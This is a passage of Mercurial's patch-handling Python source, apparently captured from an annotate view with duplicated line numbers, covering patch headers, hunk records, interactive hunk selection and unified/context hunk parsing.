855 self.writelines(self.fname, self.lines, self.mode)
855 self.write_rej()
856 self.write_rej()
856 return len(self.rej)
857 return len(self.rej)
857
858
858 class header(object):
859 class header(object):
859 """patch header
860 """patch header
860 """
861 """
861 diffgit_re = re.compile('diff --git a/(.*) b/(.*)$')
862 diffgit_re = re.compile('diff --git a/(.*) b/(.*)$')
862 diff_re = re.compile('diff -r .* (.*)$')
863 diff_re = re.compile('diff -r .* (.*)$')
863 allhunks_re = re.compile('(?:index|deleted file) ')
864 allhunks_re = re.compile('(?:index|deleted file) ')
864 pretty_re = re.compile('(?:new file|deleted file) ')
865 pretty_re = re.compile('(?:new file|deleted file) ')
865 special_re = re.compile('(?:index|deleted|copy|rename) ')
866 special_re = re.compile('(?:index|deleted|copy|rename) ')
866 newfile_re = re.compile('(?:new file)')
867 newfile_re = re.compile('(?:new file)')
867
868
868 def __init__(self, header):
869 def __init__(self, header):
869 self.header = header
870 self.header = header
870 self.hunks = []
871 self.hunks = []
871
872
872 def binary(self):
873 def binary(self):
873 return any(h.startswith('index ') for h in self.header)
874 return any(h.startswith('index ') for h in self.header)
874
875
875 def pretty(self, fp):
876 def pretty(self, fp):
876 for h in self.header:
877 for h in self.header:
877 if h.startswith('index '):
878 if h.startswith('index '):
878 fp.write(_('this modifies a binary file (all or nothing)\n'))
879 fp.write(_('this modifies a binary file (all or nothing)\n'))
879 break
880 break
880 if self.pretty_re.match(h):
881 if self.pretty_re.match(h):
881 fp.write(h)
882 fp.write(h)
882 if self.binary():
883 if self.binary():
883 fp.write(_('this is a binary file\n'))
884 fp.write(_('this is a binary file\n'))
884 break
885 break
885 if h.startswith('---'):
886 if h.startswith('---'):
886 fp.write(_('%d hunks, %d lines changed\n') %
887 fp.write(_('%d hunks, %d lines changed\n') %
887 (len(self.hunks),
888 (len(self.hunks),
888 sum([max(h.added, h.removed) for h in self.hunks])))
889 sum([max(h.added, h.removed) for h in self.hunks])))
889 break
890 break
890 fp.write(h)
891 fp.write(h)
891
892
892 def write(self, fp):
893 def write(self, fp):
893 fp.write(''.join(self.header))
894 fp.write(''.join(self.header))
894
895
895 def allhunks(self):
896 def allhunks(self):
896 return any(self.allhunks_re.match(h) for h in self.header)
897 return any(self.allhunks_re.match(h) for h in self.header)
897
898
898 def files(self):
899 def files(self):
899 match = self.diffgit_re.match(self.header[0])
900 match = self.diffgit_re.match(self.header[0])
900 if match:
901 if match:
901 fromfile, tofile = match.groups()
902 fromfile, tofile = match.groups()
902 if fromfile == tofile:
903 if fromfile == tofile:
903 return [fromfile]
904 return [fromfile]
904 return [fromfile, tofile]
905 return [fromfile, tofile]
905 else:
906 else:
906 return self.diff_re.match(self.header[0]).groups()
907 return self.diff_re.match(self.header[0]).groups()
907
908
908 def filename(self):
909 def filename(self):
909 return self.files()[-1]
910 return self.files()[-1]
910
911
911 def __repr__(self):
912 def __repr__(self):
912 return '<header %s>' % (' '.join(map(repr, self.files())))
913 return '<header %s>' % (' '.join(map(repr, self.files())))
913
914
914 def isnewfile(self):
915 def isnewfile(self):
915 return any(self.newfile_re.match(h) for h in self.header)
916 return any(self.newfile_re.match(h) for h in self.header)
916
917
917 def special(self):
918 def special(self):
918 # Special files are shown only at the header level and not at the hunk
919 # Special files are shown only at the header level and not at the hunk
919 # level for example a file that has been deleted is a special file.
920 # level for example a file that has been deleted is a special file.
920 # The user cannot change the content of the operation, in the case of
921 # The user cannot change the content of the operation, in the case of
921 # the deleted file he has to take the deletion or not take it, he
922 # the deleted file he has to take the deletion or not take it, he
922 # cannot take some of it.
923 # cannot take some of it.
923 # Newly added files are special if they are empty, they are not special
924 # Newly added files are special if they are empty, they are not special
924 # if they have some content as we want to be able to change it
925 # if they have some content as we want to be able to change it
925 nocontent = len(self.header) == 2
926 nocontent = len(self.header) == 2
926 emptynewfile = self.isnewfile() and nocontent
927 emptynewfile = self.isnewfile() and nocontent
927 return emptynewfile or \
928 return emptynewfile or \
928 any(self.special_re.match(h) for h in self.header)
929 any(self.special_re.match(h) for h in self.header)
929
930
930 class recordhunk(object):
931 class recordhunk(object):
931 """patch hunk
932 """patch hunk
932
933
933 XXX shouldn't we merge this with the other hunk class?
934 XXX shouldn't we merge this with the other hunk class?
934 """
935 """
935
936
936 def __init__(self, header, fromline, toline, proc, before, hunk, after,
937 def __init__(self, header, fromline, toline, proc, before, hunk, after,
937 maxcontext=None):
938 maxcontext=None):
938 def trimcontext(lines, reverse=False):
939 def trimcontext(lines, reverse=False):
939 if maxcontext is not None:
940 if maxcontext is not None:
940 delta = len(lines) - maxcontext
941 delta = len(lines) - maxcontext
941 if delta > 0:
942 if delta > 0:
942 if reverse:
943 if reverse:
943 return delta, lines[delta:]
944 return delta, lines[delta:]
944 else:
945 else:
945 return delta, lines[:maxcontext]
946 return delta, lines[:maxcontext]
946 return 0, lines
947 return 0, lines
947
948
948 self.header = header
949 self.header = header
949 trimedbefore, self.before = trimcontext(before, True)
950 trimedbefore, self.before = trimcontext(before, True)
950 self.fromline = fromline + trimedbefore
951 self.fromline = fromline + trimedbefore
951 self.toline = toline + trimedbefore
952 self.toline = toline + trimedbefore
952 _trimedafter, self.after = trimcontext(after, False)
953 _trimedafter, self.after = trimcontext(after, False)
953 self.proc = proc
954 self.proc = proc
954 self.hunk = hunk
955 self.hunk = hunk
955 self.added, self.removed = self.countchanges(self.hunk)
956 self.added, self.removed = self.countchanges(self.hunk)
956
957
957 def __eq__(self, v):
958 def __eq__(self, v):
958 if not isinstance(v, recordhunk):
959 if not isinstance(v, recordhunk):
959 return False
960 return False
960
961
961 return ((v.hunk == self.hunk) and
962 return ((v.hunk == self.hunk) and
962 (v.proc == self.proc) and
963 (v.proc == self.proc) and
963 (self.fromline == v.fromline) and
964 (self.fromline == v.fromline) and
964 (self.header.files() == v.header.files()))
965 (self.header.files() == v.header.files()))
965
966
966 def __hash__(self):
967 def __hash__(self):
967 return hash((tuple(self.hunk),
968 return hash((tuple(self.hunk),
968 tuple(self.header.files()),
969 tuple(self.header.files()),
969 self.fromline,
970 self.fromline,
970 self.proc))
971 self.proc))
971
972
972 def countchanges(self, hunk):
973 def countchanges(self, hunk):
973 """hunk -> (n+,n-)"""
974 """hunk -> (n+,n-)"""
974 add = len([h for h in hunk if h.startswith('+')])
975 add = len([h for h in hunk if h.startswith('+')])
975 rem = len([h for h in hunk if h.startswith('-')])
976 rem = len([h for h in hunk if h.startswith('-')])
976 return add, rem
977 return add, rem
977
978
978 def reversehunk(self):
979 def reversehunk(self):
979 """return another recordhunk which is the reverse of the hunk
980 """return another recordhunk which is the reverse of the hunk
980
981
981 If this hunk is diff(A, B), the returned hunk is diff(B, A). To do
982 If this hunk is diff(A, B), the returned hunk is diff(B, A). To do
982 that, swap fromline/toline and +/- signs while keep other things
983 that, swap fromline/toline and +/- signs while keep other things
983 unchanged.
984 unchanged.
984 """
985 """
985 m = {'+': '-', '-': '+', '\\': '\\'}
986 m = {'+': '-', '-': '+', '\\': '\\'}
986 hunk = ['%s%s' % (m[l[0:1]], l[1:]) for l in self.hunk]
987 hunk = ['%s%s' % (m[l[0:1]], l[1:]) for l in self.hunk]
987 return recordhunk(self.header, self.toline, self.fromline, self.proc,
988 return recordhunk(self.header, self.toline, self.fromline, self.proc,
988 self.before, hunk, self.after)
989 self.before, hunk, self.after)
989
990
990 def write(self, fp):
991 def write(self, fp):
991 delta = len(self.before) + len(self.after)
992 delta = len(self.before) + len(self.after)
992 if self.after and self.after[-1] == '\\ No newline at end of file\n':
993 if self.after and self.after[-1] == '\\ No newline at end of file\n':
993 delta -= 1
994 delta -= 1
994 fromlen = delta + self.removed
995 fromlen = delta + self.removed
995 tolen = delta + self.added
996 tolen = delta + self.added
996 fp.write('@@ -%d,%d +%d,%d @@%s\n' %
997 fp.write('@@ -%d,%d +%d,%d @@%s\n' %
997 (self.fromline, fromlen, self.toline, tolen,
998 (self.fromline, fromlen, self.toline, tolen,
998 self.proc and (' ' + self.proc)))
999 self.proc and (' ' + self.proc)))
999 fp.write(''.join(self.before + self.hunk + self.after))
1000 fp.write(''.join(self.before + self.hunk + self.after))
1000
1001
1001 pretty = write
1002 pretty = write
1002
1003
1003 def filename(self):
1004 def filename(self):
1004 return self.header.filename()
1005 return self.header.filename()
1005
1006
1006 def __repr__(self):
1007 def __repr__(self):
1007 return '<hunk %r@%d>' % (self.filename(), self.fromline)
1008 return '<hunk %r@%d>' % (self.filename(), self.fromline)
1008
1009
1009 def getmessages():
1010 def getmessages():
1010 return {
1011 return {
1011 'multiple': {
1012 'multiple': {
1012 'apply': _("apply change %d/%d to '%s'?"),
1013 'apply': _("apply change %d/%d to '%s'?"),
1013 'discard': _("discard change %d/%d to '%s'?"),
1014 'discard': _("discard change %d/%d to '%s'?"),
1014 'record': _("record change %d/%d to '%s'?"),
1015 'record': _("record change %d/%d to '%s'?"),
1015 },
1016 },
1016 'single': {
1017 'single': {
1017 'apply': _("apply this change to '%s'?"),
1018 'apply': _("apply this change to '%s'?"),
1018 'discard': _("discard this change to '%s'?"),
1019 'discard': _("discard this change to '%s'?"),
1019 'record': _("record this change to '%s'?"),
1020 'record': _("record this change to '%s'?"),
1020 },
1021 },
1021 'help': {
1022 'help': {
1022 'apply': _('[Ynesfdaq?]'
1023 'apply': _('[Ynesfdaq?]'
1023 '$$ &Yes, apply this change'
1024 '$$ &Yes, apply this change'
1024 '$$ &No, skip this change'
1025 '$$ &No, skip this change'
1025 '$$ &Edit this change manually'
1026 '$$ &Edit this change manually'
1026 '$$ &Skip remaining changes to this file'
1027 '$$ &Skip remaining changes to this file'
1027 '$$ Apply remaining changes to this &file'
1028 '$$ Apply remaining changes to this &file'
1028 '$$ &Done, skip remaining changes and files'
1029 '$$ &Done, skip remaining changes and files'
1029 '$$ Apply &all changes to all remaining files'
1030 '$$ Apply &all changes to all remaining files'
1030 '$$ &Quit, applying no changes'
1031 '$$ &Quit, applying no changes'
1031 '$$ &? (display help)'),
1032 '$$ &? (display help)'),
1032 'discard': _('[Ynesfdaq?]'
1033 'discard': _('[Ynesfdaq?]'
1033 '$$ &Yes, discard this change'
1034 '$$ &Yes, discard this change'
1034 '$$ &No, skip this change'
1035 '$$ &No, skip this change'
1035 '$$ &Edit this change manually'
1036 '$$ &Edit this change manually'
1036 '$$ &Skip remaining changes to this file'
1037 '$$ &Skip remaining changes to this file'
1037 '$$ Discard remaining changes to this &file'
1038 '$$ Discard remaining changes to this &file'
1038 '$$ &Done, skip remaining changes and files'
1039 '$$ &Done, skip remaining changes and files'
1039 '$$ Discard &all changes to all remaining files'
1040 '$$ Discard &all changes to all remaining files'
1040 '$$ &Quit, discarding no changes'
1041 '$$ &Quit, discarding no changes'
1041 '$$ &? (display help)'),
1042 '$$ &? (display help)'),
1042 'record': _('[Ynesfdaq?]'
1043 'record': _('[Ynesfdaq?]'
1043 '$$ &Yes, record this change'
1044 '$$ &Yes, record this change'
1044 '$$ &No, skip this change'
1045 '$$ &No, skip this change'
1045 '$$ &Edit this change manually'
1046 '$$ &Edit this change manually'
1046 '$$ &Skip remaining changes to this file'
1047 '$$ &Skip remaining changes to this file'
1047 '$$ Record remaining changes to this &file'
1048 '$$ Record remaining changes to this &file'
1048 '$$ &Done, skip remaining changes and files'
1049 '$$ &Done, skip remaining changes and files'
1049 '$$ Record &all changes to all remaining files'
1050 '$$ Record &all changes to all remaining files'
1050 '$$ &Quit, recording no changes'
1051 '$$ &Quit, recording no changes'
1051 '$$ &? (display help)'),
1052 '$$ &? (display help)'),
1052 }
1053 }
1053 }
1054 }
1054
1055
1055 def filterpatch(ui, headers, operation=None):
1056 def filterpatch(ui, headers, operation=None):
1056 """Interactively filter patch chunks into applied-only chunks"""
1057 """Interactively filter patch chunks into applied-only chunks"""
1057 messages = getmessages()
1058 messages = getmessages()
1058
1059
1059 if operation is None:
1060 if operation is None:
1060 operation = 'record'
1061 operation = 'record'
1061
1062
1062 def prompt(skipfile, skipall, query, chunk):
1063 def prompt(skipfile, skipall, query, chunk):
1063 """prompt query, and process base inputs
1064 """prompt query, and process base inputs
1064
1065
1065 - y/n for the rest of file
1066 - y/n for the rest of file
1066 - y/n for the rest
1067 - y/n for the rest
1067 - ? (help)
1068 - ? (help)
1068 - q (quit)
1069 - q (quit)
1069
1070
1070 Return True/False and possibly updated skipfile and skipall.
1071 Return True/False and possibly updated skipfile and skipall.
1071 """
1072 """
1072 newpatches = None
1073 newpatches = None
1073 if skipall is not None:
1074 if skipall is not None:
1074 return skipall, skipfile, skipall, newpatches
1075 return skipall, skipfile, skipall, newpatches
1075 if skipfile is not None:
1076 if skipfile is not None:
1076 return skipfile, skipfile, skipall, newpatches
1077 return skipfile, skipfile, skipall, newpatches
1077 while True:
1078 while True:
1078 resps = messages['help'][operation]
1079 resps = messages['help'][operation]
1079 r = ui.promptchoice("%s %s" % (query, resps))
1080 r = ui.promptchoice("%s %s" % (query, resps))
1080 ui.write("\n")
1081 ui.write("\n")
1081 if r == 8: # ?
1082 if r == 8: # ?
1082 for c, t in ui.extractchoices(resps)[1]:
1083 for c, t in ui.extractchoices(resps)[1]:
1083 ui.write('%s - %s\n' % (c, encoding.lower(t)))
1084 ui.write('%s - %s\n' % (c, encoding.lower(t)))
1084 continue
1085 continue
1085 elif r == 0: # yes
1086 elif r == 0: # yes
1086 ret = True
1087 ret = True
1087 elif r == 1: # no
1088 elif r == 1: # no
1088 ret = False
1089 ret = False
1089 elif r == 2: # Edit patch
1090 elif r == 2: # Edit patch
1090 if chunk is None:
1091 if chunk is None:
1091 ui.write(_('cannot edit patch for whole file'))
1092 ui.write(_('cannot edit patch for whole file'))
1092 ui.write("\n")
1093 ui.write("\n")
1093 continue
1094 continue
1094 if chunk.header.binary():
1095 if chunk.header.binary():
1095 ui.write(_('cannot edit patch for binary file'))
1096 ui.write(_('cannot edit patch for binary file'))
1096 ui.write("\n")
1097 ui.write("\n")
1097 continue
1098 continue
1098 # Patch comment based on the Git one (based on comment at end of
1099 # Patch comment based on the Git one (based on comment at end of
1099 # https://mercurial-scm.org/wiki/RecordExtension)
1100 # https://mercurial-scm.org/wiki/RecordExtension)
1100 phelp = '---' + _("""
1101 phelp = '---' + _("""
1101 To remove '-' lines, make them ' ' lines (context).
1102 To remove '-' lines, make them ' ' lines (context).
1102 To remove '+' lines, delete them.
1103 To remove '+' lines, delete them.
1103 Lines starting with # will be removed from the patch.
1104 Lines starting with # will be removed from the patch.
1104
1105
1105 If the patch applies cleanly, the edited hunk will immediately be
1106 If the patch applies cleanly, the edited hunk will immediately be
1106 added to the record list. If it does not apply cleanly, a rejects
1107 added to the record list. If it does not apply cleanly, a rejects
1107 file will be generated: you can use that when you try again. If
1108 file will be generated: you can use that when you try again. If
1108 all lines of the hunk are removed, then the edit is aborted and
1109 all lines of the hunk are removed, then the edit is aborted and
1109 the hunk is left unchanged.
1110 the hunk is left unchanged.
1110 """)
1111 """)
1111 (patchfd, patchfn) = pycompat.mkstemp(prefix="hg-editor-",
1112 (patchfd, patchfn) = pycompat.mkstemp(prefix="hg-editor-",
1112 suffix=".diff")
1113 suffix=".diff")
1113 ncpatchfp = None
1114 ncpatchfp = None
1114 try:
1115 try:
1115 # Write the initial patch
1116 # Write the initial patch
1116 f = util.nativeeolwriter(os.fdopen(patchfd, r'wb'))
1117 f = util.nativeeolwriter(os.fdopen(patchfd, r'wb'))
1117 chunk.header.write(f)
1118 chunk.header.write(f)
1118 chunk.write(f)
1119 chunk.write(f)
1119 f.write('\n'.join(['# ' + i for i in phelp.splitlines()]))
1120 f.write('\n'.join(['# ' + i for i in phelp.splitlines()]))
1120 f.close()
1121 f.close()
1121 # Start the editor and wait for it to complete
1122 # Start the editor and wait for it to complete
1122 editor = ui.geteditor()
1123 editor = ui.geteditor()
1123 ret = ui.system("%s \"%s\"" % (editor, patchfn),
1124 ret = ui.system("%s \"%s\"" % (editor, patchfn),
1124 environ={'HGUSER': ui.username()},
1125 environ={'HGUSER': ui.username()},
1125 blockedtag='filterpatch')
1126 blockedtag='filterpatch')
1126 if ret != 0:
1127 if ret != 0:
1127 ui.warn(_("editor exited with exit code %d\n") % ret)
1128 ui.warn(_("editor exited with exit code %d\n") % ret)
1128 continue
1129 continue
1129 # Remove comment lines
1130 # Remove comment lines
1130 patchfp = open(patchfn, r'rb')
1131 patchfp = open(patchfn, r'rb')
1131 ncpatchfp = stringio()
1132 ncpatchfp = stringio()
1132 for line in util.iterfile(patchfp):
1133 for line in util.iterfile(patchfp):
1133 line = util.fromnativeeol(line)
1134 line = util.fromnativeeol(line)
1134 if not line.startswith('#'):
1135 if not line.startswith('#'):
1135 ncpatchfp.write(line)
1136 ncpatchfp.write(line)
1136 patchfp.close()
1137 patchfp.close()
1137 ncpatchfp.seek(0)
1138 ncpatchfp.seek(0)
1138 newpatches = parsepatch(ncpatchfp)
1139 newpatches = parsepatch(ncpatchfp)
1139 finally:
1140 finally:
1140 os.unlink(patchfn)
1141 os.unlink(patchfn)
1141 del ncpatchfp
1142 del ncpatchfp
1142 # Signal that the chunk shouldn't be applied as-is, but
1143 # Signal that the chunk shouldn't be applied as-is, but
1143 # provide the new patch to be used instead.
1144 # provide the new patch to be used instead.
1144 ret = False
1145 ret = False
1145 elif r == 3: # Skip
1146 elif r == 3: # Skip
1146 ret = skipfile = False
1147 ret = skipfile = False
1147 elif r == 4: # file (Record remaining)
1148 elif r == 4: # file (Record remaining)
1148 ret = skipfile = True
1149 ret = skipfile = True
1149 elif r == 5: # done, skip remaining
1150 elif r == 5: # done, skip remaining
1150 ret = skipall = False
1151 ret = skipall = False
1151 elif r == 6: # all
1152 elif r == 6: # all
1152 ret = skipall = True
1153 ret = skipall = True
1153 elif r == 7: # quit
1154 elif r == 7: # quit
1154 raise error.Abort(_('user quit'))
1155 raise error.Abort(_('user quit'))
1155 return ret, skipfile, skipall, newpatches
1156 return ret, skipfile, skipall, newpatches
1156
1157
1157 seen = set()
1158 seen = set()
1158 applied = {} # 'filename' -> [] of chunks
1159 applied = {} # 'filename' -> [] of chunks
1159 skipfile, skipall = None, None
1160 skipfile, skipall = None, None
1160 pos, total = 1, sum(len(h.hunks) for h in headers)
1161 pos, total = 1, sum(len(h.hunks) for h in headers)
1161 for h in headers:
1162 for h in headers:
1162 pos += len(h.hunks)
1163 pos += len(h.hunks)
1163 skipfile = None
1164 skipfile = None
1164 fixoffset = 0
1165 fixoffset = 0
1165 hdr = ''.join(h.header)
1166 hdr = ''.join(h.header)
1166 if hdr in seen:
1167 if hdr in seen:
1167 continue
1168 continue
1168 seen.add(hdr)
1169 seen.add(hdr)
1169 if skipall is None:
1170 if skipall is None:
1170 h.pretty(ui)
1171 h.pretty(ui)
1171 msg = (_('examine changes to %s?') %
1172 msg = (_('examine changes to %s?') %
1172 _(' and ').join("'%s'" % f for f in h.files()))
1173 _(' and ').join("'%s'" % f for f in h.files()))
1173 r, skipfile, skipall, np = prompt(skipfile, skipall, msg, None)
1174 r, skipfile, skipall, np = prompt(skipfile, skipall, msg, None)
1174 if not r:
1175 if not r:
1175 continue
1176 continue
1176 applied[h.filename()] = [h]
1177 applied[h.filename()] = [h]
1177 if h.allhunks():
1178 if h.allhunks():
1178 applied[h.filename()] += h.hunks
1179 applied[h.filename()] += h.hunks
1179 continue
1180 continue
1180 for i, chunk in enumerate(h.hunks):
1181 for i, chunk in enumerate(h.hunks):
1181 if skipfile is None and skipall is None:
1182 if skipfile is None and skipall is None:
1182 chunk.pretty(ui)
1183 chunk.pretty(ui)
1183 if total == 1:
1184 if total == 1:
1184 msg = messages['single'][operation] % chunk.filename()
1185 msg = messages['single'][operation] % chunk.filename()
1185 else:
1186 else:
1186 idx = pos - len(h.hunks) + i
1187 idx = pos - len(h.hunks) + i
1187 msg = messages['multiple'][operation] % (idx, total,
1188 msg = messages['multiple'][operation] % (idx, total,
1188 chunk.filename())
1189 chunk.filename())
1189 r, skipfile, skipall, newpatches = prompt(skipfile,
1190 r, skipfile, skipall, newpatches = prompt(skipfile,
1190 skipall, msg, chunk)
1191 skipall, msg, chunk)
1191 if r:
1192 if r:
1192 if fixoffset:
1193 if fixoffset:
1193 chunk = copy.copy(chunk)
1194 chunk = copy.copy(chunk)
1194 chunk.toline += fixoffset
1195 chunk.toline += fixoffset
1195 applied[chunk.filename()].append(chunk)
1196 applied[chunk.filename()].append(chunk)
1196 elif newpatches is not None:
1197 elif newpatches is not None:
1197 for newpatch in newpatches:
1198 for newpatch in newpatches:
1198 for newhunk in newpatch.hunks:
1199 for newhunk in newpatch.hunks:
1199 if fixoffset:
1200 if fixoffset:
1200 newhunk.toline += fixoffset
1201 newhunk.toline += fixoffset
1201 applied[newhunk.filename()].append(newhunk)
1202 applied[newhunk.filename()].append(newhunk)
1202 else:
1203 else:
1203 fixoffset += chunk.removed - chunk.added
1204 fixoffset += chunk.removed - chunk.added
1204 return (sum([h for h in applied.itervalues()
1205 return (sum([h for h in applied.itervalues()
1205 if h[0].special() or len(h) > 1], []), {})
1206 if h[0].special() or len(h) > 1], []), {})
1206 class hunk(object):
1207 class hunk(object):
1207 def __init__(self, desc, num, lr, context):
1208 def __init__(self, desc, num, lr, context):
1208 self.number = num
1209 self.number = num
1209 self.desc = desc
1210 self.desc = desc
1210 self.hunk = [desc]
1211 self.hunk = [desc]
1211 self.a = []
1212 self.a = []
1212 self.b = []
1213 self.b = []
1213 self.starta = self.lena = None
1214 self.starta = self.lena = None
1214 self.startb = self.lenb = None
1215 self.startb = self.lenb = None
1215 if lr is not None:
1216 if lr is not None:
1216 if context:
1217 if context:
1217 self.read_context_hunk(lr)
1218 self.read_context_hunk(lr)
1218 else:
1219 else:
1219 self.read_unified_hunk(lr)
1220 self.read_unified_hunk(lr)
1220
1221
1221 def getnormalized(self):
1222 def getnormalized(self):
1222 """Return a copy with line endings normalized to LF."""
1223 """Return a copy with line endings normalized to LF."""
1223
1224
1224 def normalize(lines):
1225 def normalize(lines):
1225 nlines = []
1226 nlines = []
1226 for line in lines:
1227 for line in lines:
1227 if line.endswith('\r\n'):
1228 if line.endswith('\r\n'):
1228 line = line[:-2] + '\n'
1229 line = line[:-2] + '\n'
1229 nlines.append(line)
1230 nlines.append(line)
1230 return nlines
1231 return nlines
1231
1232
1232 # Dummy object, it is rebuilt manually
1233 # Dummy object, it is rebuilt manually
1233 nh = hunk(self.desc, self.number, None, None)
1234 nh = hunk(self.desc, self.number, None, None)
1234 nh.number = self.number
1235 nh.number = self.number
1235 nh.desc = self.desc
1236 nh.desc = self.desc
1236 nh.hunk = self.hunk
1237 nh.hunk = self.hunk
1237 nh.a = normalize(self.a)
1238 nh.a = normalize(self.a)
1238 nh.b = normalize(self.b)
1239 nh.b = normalize(self.b)
1239 nh.starta = self.starta
1240 nh.starta = self.starta
1240 nh.startb = self.startb
1241 nh.startb = self.startb
1241 nh.lena = self.lena
1242 nh.lena = self.lena
1242 nh.lenb = self.lenb
1243 nh.lenb = self.lenb
1243 return nh
1244 return nh
1244
1245
1245 def read_unified_hunk(self, lr):
1246 def read_unified_hunk(self, lr):
1246 m = unidesc.match(self.desc)
1247 m = unidesc.match(self.desc)
1247 if not m:
1248 if not m:
1248 raise PatchError(_("bad hunk #%d") % self.number)
1249 raise PatchError(_("bad hunk #%d") % self.number)
1249 self.starta, self.lena, self.startb, self.lenb = m.groups()
1250 self.starta, self.lena, self.startb, self.lenb = m.groups()
1250 if self.lena is None:
1251 if self.lena is None:
1251 self.lena = 1
1252 self.lena = 1
1252 else:
1253 else:
1253 self.lena = int(self.lena)
1254 self.lena = int(self.lena)
1254 if self.lenb is None:
1255 if self.lenb is None:
1255 self.lenb = 1
1256 self.lenb = 1
1256 else:
1257 else:
1257 self.lenb = int(self.lenb)
1258 self.lenb = int(self.lenb)
1258 self.starta = int(self.starta)
1259 self.starta = int(self.starta)
1259 self.startb = int(self.startb)
1260 self.startb = int(self.startb)
1260 try:
1261 try:
1261 diffhelper.addlines(lr, self.hunk, self.lena, self.lenb,
1262 diffhelper.addlines(lr, self.hunk, self.lena, self.lenb,
1262 self.a, self.b)
1263 self.a, self.b)
1263 except error.ParseError as e:
1264 except error.ParseError as e:
1264 raise PatchError(_("bad hunk #%d: %s") % (self.number, e))
1265 raise PatchError(_("bad hunk #%d: %s") % (self.number, e))
1265 # if we hit eof before finishing out the hunk, the last line will
1266 # if we hit eof before finishing out the hunk, the last line will
1266 # be zero length. Lets try to fix it up.
1267 # be zero length. Lets try to fix it up.
1267 while len(self.hunk[-1]) == 0:
1268 while len(self.hunk[-1]) == 0:
1268 del self.hunk[-1]
1269 del self.hunk[-1]
1269 del self.a[-1]
1270 del self.a[-1]
1270 del self.b[-1]
1271 del self.b[-1]
1271 self.lena -= 1
1272 self.lena -= 1
1272 self.lenb -= 1
1273 self.lenb -= 1
1273 self._fixnewline(lr)
1274 self._fixnewline(lr)
1274
1275
1275 def read_context_hunk(self, lr):
1276 def read_context_hunk(self, lr):
1276 self.desc = lr.readline()
1277 self.desc = lr.readline()
1277 m = contextdesc.match(self.desc)
1278 m = contextdesc.match(self.desc)
1278 if not m:
1279 if not m:
1279 raise PatchError(_("bad hunk #%d") % self.number)
1280 raise PatchError(_("bad hunk #%d") % self.number)
1280 self.starta, aend = m.groups()
1281 self.starta, aend = m.groups()
1281 self.starta = int(self.starta)
1282 self.starta = int(self.starta)
1282 if aend is None:
1283 if aend is None:
1283 aend = self.starta
1284 aend = self.starta
1284 self.lena = int(aend) - self.starta
1285 self.lena = int(aend) - self.starta
1285 if self.starta:
1286 if self.starta:
1286 self.lena += 1
1287 self.lena += 1
1287 for x in xrange(self.lena):
1288 for x in xrange(self.lena):
1288 l = lr.readline()
1289 l = lr.readline()
1289 if l.startswith('---'):
1290 if l.startswith('---'):
1290 # lines addition, old block is empty
1291 # lines addition, old block is empty
1291 lr.push(l)
1292 lr.push(l)
1292 break
1293 break
1293 s = l[2:]
1294 s = l[2:]
1294 if l.startswith('- ') or l.startswith('! '):
1295 if l.startswith('- ') or l.startswith('! '):
1295 u = '-' + s
1296 u = '-' + s
1296 elif l.startswith(' '):
1297 elif l.startswith(' '):
1297 u = ' ' + s
1298 u = ' ' + s
1298 else:
1299 else:
1299 raise PatchError(_("bad hunk #%d old text line %d") %
1300 raise PatchError(_("bad hunk #%d old text line %d") %
1300 (self.number, x))
1301 (self.number, x))
1301 self.a.append(u)
1302 self.a.append(u)
1302 self.hunk.append(u)
1303 self.hunk.append(u)
1303
1304
1304 l = lr.readline()
1305 l = lr.readline()
1305 if l.startswith('\ '):
1306 if l.startswith('\ '):
1306 s = self.a[-1][:-1]
1307 s = self.a[-1][:-1]
1307 self.a[-1] = s
1308 self.a[-1] = s
1308 self.hunk[-1] = s
1309 self.hunk[-1] = s
1309 l = lr.readline()
1310 l = lr.readline()
1310 m = contextdesc.match(l)
1311 m = contextdesc.match(l)
1311 if not m:
1312 if not m:
1312 raise PatchError(_("bad hunk #%d") % self.number)
1313 raise PatchError(_("bad hunk #%d") % self.number)
1313 self.startb, bend = m.groups()
1314 self.startb, bend = m.groups()
1314 self.startb = int(self.startb)
1315 self.startb = int(self.startb)
1315 if bend is None:
1316 if bend is None:
1316 bend = self.startb
1317 bend = self.startb
1317 self.lenb = int(bend) - self.startb
1318 self.lenb = int(bend) - self.startb
1318 if self.startb:
1319 if self.startb:
1319 self.lenb += 1
1320 self.lenb += 1
1320 hunki = 1
1321 hunki = 1
1321 for x in xrange(self.lenb):
1322 for x in xrange(self.lenb):
1322 l = lr.readline()
1323 l = lr.readline()
1323 if l.startswith('\ '):
1324 if l.startswith('\ '):
1324 # XXX: the only way to hit this is with an invalid line range.
1325 # XXX: the only way to hit this is with an invalid line range.
1325 # The no-eol marker is not counted in the line range, but I
1326 # The no-eol marker is not counted in the line range, but I
1326 # guess there are diff(1) out there which behave differently.
1327 # guess there are diff(1) out there which behave differently.
1327 s = self.b[-1][:-1]
1328 s = self.b[-1][:-1]
1328 self.b[-1] = s
1329 self.b[-1] = s
1329 self.hunk[hunki - 1] = s
1330 self.hunk[hunki - 1] = s
1330 continue
1331 continue
1331 if not l:
1332 if not l:
1332 # line deletions, new block is empty and we hit EOF
1333 # line deletions, new block is empty and we hit EOF
1333 lr.push(l)
1334 lr.push(l)
1334 break
1335 break
1335 s = l[2:]
1336 s = l[2:]
1336 if l.startswith('+ ') or l.startswith('! '):
1337 if l.startswith('+ ') or l.startswith('! '):
1337 u = '+' + s
1338 u = '+' + s
1338 elif l.startswith(' '):
1339 elif l.startswith(' '):
1339 u = ' ' + s
1340 u = ' ' + s
1340 elif len(self.b) == 0:
1341 elif len(self.b) == 0:
1341 # line deletions, new block is empty
1342 # line deletions, new block is empty
1342 lr.push(l)
1343 lr.push(l)
1343 break
1344 break
1344 else:
1345 else:
1345 raise PatchError(_("bad hunk #%d old text line %d") %
1346 raise PatchError(_("bad hunk #%d old text line %d") %
1346 (self.number, x))
1347 (self.number, x))
1347 self.b.append(s)
1348 self.b.append(s)
1348 while True:
1349 while True:
1349 if hunki >= len(self.hunk):
1350 if hunki >= len(self.hunk):
1350 h = ""
1351 h = ""
1351 else:
1352 else:
1352 h = self.hunk[hunki]
1353 h = self.hunk[hunki]
1353 hunki += 1
1354 hunki += 1
1354 if h == u:
1355 if h == u:
1355 break
1356 break
1356 elif h.startswith('-'):
1357 elif h.startswith('-'):
1357 continue
1358 continue
1358 else:
1359 else:
1359 self.hunk.insert(hunki - 1, u)
1360 self.hunk.insert(hunki - 1, u)
1360 break
1361 break
1361
1362
1362 if not self.a:
1363 if not self.a:
1363 # this happens when lines were only added to the hunk
1364 # this happens when lines were only added to the hunk
1364 for x in self.hunk:
1365 for x in self.hunk:
1365 if x.startswith('-') or x.startswith(' '):
1366 if x.startswith('-') or x.startswith(' '):
